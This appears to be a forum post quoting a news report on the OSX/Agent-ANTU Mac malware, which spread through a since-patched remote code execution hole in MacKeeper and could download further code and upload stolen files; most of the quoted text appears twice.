- Jan 8, 2011
- 22,361
"Researchers at BAE just reported on a Mac bot known as OSX/Agent-ANTU that was allegedly distributed in a novel way.
The crooks used a security hole in a controversial Mac security and cleanup utility called MacKeeper.
MacKeeper quickly patched the hole after it became known, but until you received the update you were at risk of a Remote Code Execution (RCE) hole.
As long as you were unpatched, a crook could simply entice or redirect you to a poisoned website, and use a single line of JavaScript to send a command script to MacKeeper, which would then run it.
Unfortunately, according to BAE, some crooks struck while the iron was hot.
The crooks sent unpatched MacKeeper users to a web page that tricked their Macs into downloading the OSX/Agent-ANTU malware.
Ironically, the downloader used a fake malware report to justify any MacKeeper popup that might ask you for your administrative password, thus giving the malware system-wide powers.
As in the OSX/LaoShu case mentioned above, the malware included not only a downloader component to let the crooks install what they wanted, but also an upload function handy for stealing files."
The crooks used a security hole in a controversial Mac security and cleanup utility called MacKeeper.
MacKeeper quickly patched the hole after it became known, but until you received the update you were at risk of a Remote Code Execution (RCE) hole.
As long as you were unpatched, a crook could simply entice or redirect you to a poisoned website, and use a single line of JavaScript to send a command script to MacKeeper, which would then run it.
Unfortunately, according to BAE, some crooks struck while the iron was hot.
The crooks sent unpatched MacKeeper users to a web page that tricked their Macs into downloading the OSX/Agent-ANTU malware.
Ironically, the downloader used a fake malware report to justify any MacKeeper popup that might ask you for your administrative password, thus giving the malware system-wide powers.
As in the OSX/LaoShu case mentioned above, the malware included not only a downloader component to let the crooks install what they wanted, but also an upload function handy for stealing files."
